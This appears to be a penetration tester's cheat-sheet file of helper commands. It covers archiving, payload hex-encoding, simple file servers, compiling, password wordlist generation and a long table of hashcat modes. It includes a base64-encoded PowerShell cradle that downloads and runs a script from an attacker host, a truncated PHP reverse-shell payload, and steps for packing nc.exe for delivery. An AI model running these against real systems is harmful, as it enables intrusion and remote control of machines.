-
Notifications
You must be signed in to change notification settings - Fork 35
/
Notes.Helpers.txt
835 lines (725 loc) · 39.5 KB
/
Notes.Helpers.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
`` Compression
~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/
`` Convert raw payload to comma separated hex
~$ hexdump -ve '1/1 ",0x%02x"' payload.raw | sed "s/^,//" > payload.txt
`` Convert payload to hex
~$ echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'
# 3c3f70...
~$ echo 3c3f70... | xxd -ps -r
`` Powershell
`` Base64 encoding
~PS> $text = "(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/run.txt') | IEX"
~PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
~PS> $EncodedText = [Convert]::ToBase64String($bytes)
~PS> $EncodedText
`` Sources
`` Update Git library
~$ export TMPPWD=$PWD; export GIT_ASKPASS=echo; for x in $(find . -name '.git' -type d | xargs -n 1 dirname); do cd $TMPPWD; cd $x; echo -e "\n\n--> $(pwd)"; git reset --hard; git remote prune origin; git pull; done; cd $TMPPWD
`` diff
~$ icdiff --strip-trailing-cr -H *.c
`` gcc
`` Compiling for GNU/Linux
~$ gcc -shared source.c -o executable
~$ gcc -static source.c -o executable
~$ gcc -m32 source.c -o executable
~$ gcc -m32 source.c -o executable -Wl,--hash-style=both
`` Compiling for Windows
~$ i686-w64-mingw32-gcc -lws2_32 -o executable source.c
~$ i686-w64-mingw32-gcc -o executable source.c
`` All files in current directory
~$ for fil in $(ls *.c); do echo gcc -o ${fil::${#fil}-2} $fil; done
`` Java
`` Signing applets
~$ javac -source 1.7 -target 1.7 Java.java
~$ echo "Permissions: all-permissions" > manifest.txt
~$ jar cvf Java.jar Java.class
~$ jarsigner -keystore mykeystore -storepass secret -keypass mykeypass -signedjar SignedJava.jar Java.jar signapplet
~$ keytool -genkey -alias signapplet -keystore mykeystore -keypass secret -storepass secret
~$ keytool -list -v -keystore mykeystore
~$ jarsigner -keystore mykeystore -storepass secret -keypass secret -signedjar SignedJava.jar Java.jar signapplet
`` Packing
`` Python to EXE
~$ python pyinstaller.py --onefile exploit.py
`` EXE to BAT
~$ cp /usr/share/windows-binaries/nc.exe ./nc.exe
~$ upx -9 nc.exe
~$ wine /usr/share/windows-binaries/exe2bat.exe nc.exe nc.txt
`` Servers
`` HTTP
`` socat
~$ socat TCP-LISTEN:8000,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type\: text/plain; echo; cat"
`` Python
~$ python2 -m SimpleHTTPServer
~$ python3 -m http.server
`` Python IPv6
~$ echo -e 'import BaseHTTPServer\nimport SimpleHTTPServer\nimport socket\nclass HTTPServer6(BaseHTTPServer.HTTPServer):\n address_family = socket.AF_INET6\nif __name__ == "__main__":\n SimpleHTTPServer.test(ServerClass=HTTPServer6)' | python2
`` Ruby
~$ ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start"
`` PHP
~$ php -S 0.0.0.0:8000
`` Perl
~$ cpan HTTP::Server::Brick
~$ perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
`` FTP
~$ python -m pyftpdlib -p 21 -w
`` SMB
~$ sudo impacket-smbserver.py TEST .
`` TFTP
`` Server
~$ atftpd --daemon --port 69 /tftp
`` Client
~$ tftp -i VAR_TARGET_HOST GET nc.exe
`` SMTP
`` Server
~$ socat - TCP-LISTEN:25,crlf
~$ socat readline TCP-LISTEN:25,crlf
`` Local delivery
~$ socat UNIX-LISTEN:/tmp/mail,fork,perm-early=0666 exec:"/usr/sbin/sendmail -bs"
~$ socat - /tmp/mail
`` Python
~# python -m smtpd -n -c DebuggingServer 0.0.0.0:25
`` IP
`` Conversion
172.217.16.14
((172 * 256 + 217) * 256 + 16 ) * 256 + 14 = 2899906574 = 0xacd9100e
127.0.0.1 == 2130706433 == 7F000001 == 1111111000000000000000000000001 == 017700000001
`` What is my IP?
~$ curl -s https://api.ipify.org
`` File analysis
~$ file executable
~$ binwalk executable
~$ foremost executable
`` Passwords
`` Combining
~$ /usr/share/hashcat-utils/combinator.bin wordlist wordlist > combined
~$ crunch 1 2 -p combine couple words > combined
`` Wordlists
~$ cewl http://VAR_TARGET_HOST -d 1 -m 6 -w wordlist
`` Extract last column separated by :
~$ cat VAR_FILE | grep -o '[^:]*$'
`` Length
~$ awk 'length($0)>4 && length($0)<12' unique > final
`` Lower case and keep letters only
~$ awk '{print tolower($0)}' VAR_FILE | tr -d '[0-9]' | tr -d '[:punct:]'
`` Most frequent words
~$ cat VAR_FILE | sort | uniq -c | sort -nr | head -n 1000
`` Keep only the lines unique to sorted2
~$ comm -13 sorted1 sorted2 > sorted3
`` Lines less than 21 chars and remove e-mail addresses
~$ awk 'length($0)<21' VAR_FILE | grep -vaEih '([[:alnum:]_.-]+@[[:alnum:]_.-]+?\.[[:alpha:].]{2,6})'
`` Sort by line length
~$ cat VAR_FILE | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2-
`` Sorting large password list by count
~$ sort --compress-program=lzop VAR_FILE --parallel 8 | uniq -c | sort --compress-program=lzop --parallel 8 -nr
`` Remove preceding spaces
~$ sed 's/^ *//g' VAR_FILE
`` Remove preceding numbers
~$ cut -d" " -f2- VAR_FILE
`` Splitting lists by group/column selection
-- Ex. "22 username;password" or "12 password:password1"
-- macOS (-nE)
~$ sed -nr 's/(.*)[[:space:]](.*);(.*)/\1 \2/p' VAR_FILE
`` Removing duplicates based on second column with a single space delimiter (useful with uniq -c)
~$ sort -u -t' ' -k2,2 VAR_FILE
`` Remove all non-alphanumeric lines
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0A-\x1F\x7F-\xFF]" VAR_FILE
`` Remove all lines with control characters
-- For macOS use pcregrep (homebrew/pcre)
~$ LC_ALL=C grep -Pv "[\x00-\x08\x0B\x0C\x0E-\x1F]" VAR_FILE
`` Permutations
~$ crunch 4 8 > wordlist
~$ hashcat -r /usr/share/hashcat/rules/hybrid/append_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/hybrid/prepend_ldus.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/combinator.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/best64.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/T0XlCv1.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/unix-ninja-leetspeak.rule --stdout wordlist >> permuted
~$ hashcat -r /usr/share/hashcat/rules/rockyou-30000.rule --stdout wordlist >> permuted
~$ sort permuted | uniq > unique
`` Hashcat modes
# | Name | Category
======+==================================================+======================================
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
100 | SHA1 | Raw Hash
1300 | SHA2-224 | Raw Hash
1400 | SHA2-256 | Raw Hash
10800 | SHA2-384 | Raw Hash
1700 | SHA2-512 | Raw Hash
17300 | SHA3-224 | Raw Hash
17400 | SHA3-256 | Raw Hash
17500 | SHA3-384 | Raw Hash
17600 | SHA3-512 | Raw Hash
6000 | RIPEMD-160 | Raw Hash
600 | BLAKE2b-512 | Raw Hash
11700 | GOST R 34.11-2012 (Streebog) 256-bit, big-endian | Raw Hash
11800 | GOST R 34.11-2012 (Streebog) 512-bit, big-endian | Raw Hash
6900 | GOST R 34.11-94 | Raw Hash
5100 | Half MD5 | Raw Hash
18700 | Java Object hashCode() | Raw Hash
17700 | Keccak-224 | Raw Hash
17800 | Keccak-256 | Raw Hash
17900 | Keccak-384 | Raw Hash
18000 | Keccak-512 | Raw Hash
21400 | sha256(sha256_bin($pass)) | Raw Hash
6100 | Whirlpool | Raw Hash
10100 | SipHash | Raw Hash
21000 | BitShares v0.x - sha512(sha512_bin(pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
3800 | md5($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
3710 | md5($salt.md5($pass)) | Raw Hash, Salted and/or Iterated
4110 | md5($salt.md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
4010 | md5($salt.md5($salt.$pass)) | Raw Hash, Salted and/or Iterated
21300 | md5($salt.sha1($salt.$pass)) | Raw Hash, Salted and/or Iterated
40 | md5($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
2600 | md5(md5($pass)) | Raw Hash, Salted and/or Iterated
3910 | md5(md5($pass).md5($salt)) | Raw Hash, Salted and/or Iterated
4400 | md5(sha1($pass)) | Raw Hash, Salted and/or Iterated
20900 | md5(sha1($pass).md5($pass).sha1($pass)) | Raw Hash, Salted and/or Iterated
21200 | md5(sha1($salt).md5($pass)) | Raw Hash, Salted and/or Iterated
4300 | md5(strtoupper(md5($pass))) | Raw Hash, Salted and/or Iterated
30 | md5(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
110 | sha1($pass.$salt) | Raw Hash, Salted and/or Iterated
120 | sha1($salt.$pass) | Raw Hash, Salted and/or Iterated
4900 | sha1($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
4520 | sha1($salt.sha1($pass)) | Raw Hash, Salted and/or Iterated
140 | sha1($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
19300 | sha1($salt1.$pass.$salt2) | Raw Hash, Salted and/or Iterated
14400 | sha1(CX) | Raw Hash, Salted and/or Iterated
4700 | sha1(md5($pass)) | Raw Hash, Salted and/or Iterated
4710 | sha1(md5($pass).$salt) | Raw Hash, Salted and/or Iterated
21100 | sha1(md5($pass.$salt)) | Raw Hash, Salted and/or Iterated
18500 | sha1(md5(md5($pass))) | Raw Hash, Salted and/or Iterated
4500 | sha1(sha1($pass)) | Raw Hash, Salted and/or Iterated
130 | sha1(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1410 | sha256($pass.$salt) | Raw Hash, Salted and/or Iterated
1420 | sha256($salt.$pass) | Raw Hash, Salted and/or Iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
20800 | sha256(md5($pass)) | Raw Hash, Salted and/or Iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash, Salted and/or Iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated
1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated
1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated
50 | HMAC-MD5 (key = $pass) | Raw Hash, Authenticated
60 | HMAC-MD5 (key = $salt) | Raw Hash, Authenticated
150 | HMAC-SHA1 (key = $pass) | Raw Hash, Authenticated
160 | HMAC-SHA1 (key = $salt) | Raw Hash, Authenticated
1450 | HMAC-SHA256 (key = $pass) | Raw Hash, Authenticated
1460 | HMAC-SHA256 (key = $salt) | Raw Hash, Authenticated
1750 | HMAC-SHA512 (key = $pass) | Raw Hash, Authenticated
1760 | HMAC-SHA512 (key = $salt) | Raw Hash, Authenticated
11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash, Authenticated
11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash, Authenticated
11850 | HMAC-Streebog-512 (key = $pass), big-endian | Raw Hash, Authenticated
11860 | HMAC-Streebog-512 (key = $salt), big-endian | Raw Hash, Authenticated
11500 | CRC32 | Raw Checksum
14100 | 3DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
14000 | DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack
14900 | Skip32 (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
11900 | PBKDF2-HMAC-MD5 | Generic KDF
12000 | PBKDF2-HMAC-SHA1 | Generic KDF
10900 | PBKDF2-HMAC-SHA256 | Generic KDF
12100 | PBKDF2-HMAC-SHA512 | Generic KDF
8900 | scrypt | Generic KDF
400 | phpass | Generic KDF
16900 | Ansible Vault | Generic KDF
12001 | Atlassian (PBKDF2-HMAC-SHA1) | Generic KDF
20200 | Python passlib pbkdf2-sha512 | Generic KDF
20300 | Python passlib pbkdf2-sha256 | Generic KDF
20400 | Python passlib pbkdf2-sha1 | Generic KDF
16100 | TACACS+ | Network Protocols
11400 | SIP digest authentication (MD5) | Network Protocols
5300 | IKE-PSK MD5 | Network Protocols
5400 | IKE-PSK SHA1 | Network Protocols
2500 | WPA-EAPOL-PBKDF2 | Network Protocols
2501 | WPA-EAPOL-PMK | Network Protocols
22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols
22001 | WPA-PMK-PMKID+EAPOL | Network Protocols
16800 | WPA-PMKID-PBKDF2 | Network Protocols
16801 | WPA-PMKID-PMK | Network Protocols
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols
10200 | CRAM-MD5 | Network Protocols
4800 | iSCSI CHAP authentication, MD5(CHAP) | Network Protocols
16500 | JWT (JSON Web Token) | Network Protocols
22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols
22301 | Telegram Mobile App Passcode (SHA256) | Network Protocols
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols
18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocols
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols
5600 | NetNTLMv2 | Network Protocols
23 | Skype | Network Protocols
11100 | PostgreSQL CRAM (MD5) | Network Protocols
11200 | MySQL CRAM (SHA1) | Network Protocols
8500 | RACF | Operating System
6300 | AIX {smd5} | Operating System
6700 | AIX {ssha1} | Operating System
6400 | AIX {ssha256} | Operating System
6500 | AIX {ssha512} | Operating System
3000 | LM | Operating System
19000 | QNX /etc/shadow (MD5) | Operating System
19100 | QNX /etc/shadow (SHA256) | Operating System
19200 | QNX /etc/shadow (SHA512) | Operating System
15300 | DPAPI masterkey file v1 | Operating System
15900 | DPAPI masterkey file v2 | Operating System
7200 | GRUB 2 | Operating System
12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System
12400 | BSDi Crypt, Extended DES | Operating System
1000 | NTLM | Operating System
122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System
1722 | macOS v10.7 | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
9900 | Radmin2 | Operating System
5800 | Samsung Android Password/PIN | Operating System
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
1500 | descrypt, DES (Unix), Traditional DES | Operating System
7400 | sha256crypt $5$, SHA256 (Unix) | Operating System
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
13800 | Windows Phone 8+ PIN/password | Operating System
2410 | Cisco-ASA MD5 | Operating System
9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System
9300 | Cisco-IOS $9$ (scrypt) | Operating System
5700 | Cisco-IOS type 4 (SHA256) | Operating System
2400 | Cisco-PIX MD5 | Operating System
8100 | Citrix NetScaler (SHA1) | Operating System
22200 | Citrix NetScaler (SHA512) | Operating System
1100 | Domain Cached Credentials (DCC), MS Cache | Operating System
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | Operating System
7000 | FortiGate (FortiOS) | Operating System
125 | ArubaOS | Operating System
501 | Juniper IVE | Operating System
22 | Juniper NetScreen/SSG (ScreenOS) | Operating System
15100 | Juniper/NetBSD sha1crypt | Operating System
131 | MSSQL (2000) | Database Server
132 | MSSQL (2005) | Database Server
1731 | MSSQL (2012, 2014) | Database Server
12 | PostgreSQL | Database Server
3100 | Oracle H: Type (Oracle 7+) | Database Server
112 | Oracle S: Type (Oracle 11+) | Database Server
12300 | Oracle T: Type (Oracle 12+) | Database Server
7401 | MySQL $A$ (sha256crypt) | Database Server
200 | MySQL323 | Database Server
300 | MySQL4.1/MySQL5 | Database Server
8000 | Sybase ASE | Database Server
1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server
8300 | DNSSEC (NSEC3) | FTP, HTTP, SMTP, LDAP Server
16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server
1411 | SSHA-256(Base64), LDAP {SSHA256} | FTP, HTTP, SMTP, LDAP Server
1711 | SSHA-512(Base64), LDAP {SSHA512} | FTP, HTTP, SMTP, LDAP Server
10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server
15000 | FileZilla Server >= 0.9.55 | FTP, HTTP, SMTP, LDAP Server
12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
141 | Episerver 6.x < .NET 4 | FTP, HTTP, SMTP, LDAP Server
1441 | Episerver 6.x >= .NET 4 | FTP, HTTP, SMTP, LDAP Server
101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server
111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server
7700 | SAP CODVN B (BCODE) | Enterprise Application Software (EAS)
7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
7800 | SAP CODVN F/G (PASSCODE) | Enterprise Application Software (EAS)
7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | Enterprise Application Software (EAS)
133 | PeopleSoft | Enterprise Application Software (EAS)
13500 | PeopleSoft PS_TOKEN | Enterprise Application Software (EAS)
21500 | SolarWinds Orion | Enterprise Application Software (EAS)
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
8700 | Lotus Notes/Domino 6 | Enterprise Application Software (EAS)
9100 | Lotus Notes/Domino 8 | Enterprise Application Software (EAS)
20600 | Oracle Transportation Management (SHA256) | Enterprise Application Software (EAS)
4711 | Huawei sha1(md5($pass).$salt) | Enterprise Application Software (EAS)
20711 | AuthMe sha256 | Enterprise Application Software (EAS)
12200 | eCryptfs | Full-Disk Encryption (FDE)
22400 | AES Crypt (SHA256) | Full-Disk Encryption (FDE)
14600 | LUKS | Full-Disk Encryption (FDE)
13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption (FDE)
13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption (FDE)
13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption (FDE)
13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption (FDE)
13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
16700 | FileVault 2 | Full-Disk Encryption (FDE)
20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
22100 | BitLocker | Full-Disk Encryption (FDE)
12900 | Android FDE (Samsung DEK) | Full-Disk Encryption (FDE)
8800 | Android FDE <= 4.3 | Full-Disk Encryption (FDE)
18300 | Apple File System (APFS) | Full-Disk Encryption (FDE)
6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | Documents
10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | Documents
10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | Documents
10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | Documents
10600 | PDF 1.7 Level 3 (Acrobat 9) | Documents
10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | Documents
9400 | MS Office 2007 | Documents
9500 | MS Office 2010 | Documents
9600 | MS Office 2013 | Documents
9700 | MS Office <= 2003 $0/$1, MD5 + RC4 | Documents
9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 | Documents
9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 | Documents
9800 | MS Office <= 2003 $3/$4, SHA1 + RC4 | Documents
9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1 | Documents
9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2 | Documents
18400 | Open Document Format (ODF) 1.2 (SHA-256, AES) | Documents
18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents
16200 | Apple Secure Notes | Documents
15500 | JKS Java Key Store Private Keys (SHA1) | Password Managers
6600 | 1Password, agilekeychain | Password Managers
8200 | 1Password, cloudkeychain | Password Managers
9000 | Password Safe v2 | Password Managers
5200 | Password Safe v3 | Password Managers
6800 | LastPass + LastPass sniffed | Password Managers
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Managers
11300 | Bitcoin/Litecoin wallet.dat | Password Managers
16600 | Electrum Wallet (Salt-Type 1-3) | Password Managers
21700 | Electrum Wallet (Salt-Type 4) | Password Managers
21800 | Electrum Wallet (Salt-Type 5) | Password Managers
12700 | Blockchain, My Wallet | Password Managers
15200 | Blockchain, My Wallet, V2 | Password Managers
18800 | Blockchain, My Wallet, Second Password (SHA256) | Password Managers
16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15700 | Ethereum Wallet, SCRYPT | Password Managers
22500 | MultiBit Classic .key (MD5) | Password Managers
11600 | 7-Zip | Archives
12500 | RAR3-hp | Archives
13000 | RAR5 | Archives
17200 | PKZIP (Compressed) | Archives
17220 | PKZIP (Compressed Multi-File) | Archives
17225 | PKZIP (Mixed Multi-File) | Archives
17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives
17210 | PKZIP (Uncompressed) | Archives
20500 | PKZIP Master Key | Archives
20510 | PKZIP Master Key (6 byte optimization) | Archives
14700 | iTunes backup < 10.0 | Archives
14800 | iTunes backup >= 10.0 | Archives
13600 | WinZip | Archives
18900 | Android Backup | Archives
13200 | AxCrypt | Archives
13300 | AxCrypt in-memory SHA1 | Archives
8400 | WBB3 (Woltlab Burning Board) | Forums, CMS, E-Commerce
2611 | vBulletin < v3.8.5 | Forums, CMS, E-Commerce
2711 | vBulletin >= v3.8.5 | Forums, CMS, E-Commerce
2612 | PHPS | Forums, CMS, E-Commerce
121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce
3711 | MediaWiki B type | Forums, CMS, E-Commerce
4521 | Redmine | Forums, CMS, E-Commerce
11 | Joomla < 2.5.18 | Forums, CMS, E-Commerce
13900 | OpenCart | Forums, CMS, E-Commerce
11000 | PrestaShop | Forums, CMS, E-Commerce
16000 | Tripcode | Forums, CMS, E-Commerce
7900 | Drupal7 | Forums, CMS, E-Commerce
21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce
4522 | PunBB | Forums, CMS, E-Commerce
2811 | MyBB 1.2+, IPB2+ (Invision Power Board) | Forums, CMS, E-Commerce
18100 | TOTP (HMAC-SHA1) | One-Time Passwords
2000 | STDOUT | Plaintext
99999 | Plaintext | Plaintext
21600 | Web2py pbkdf2-sha512 | Framework
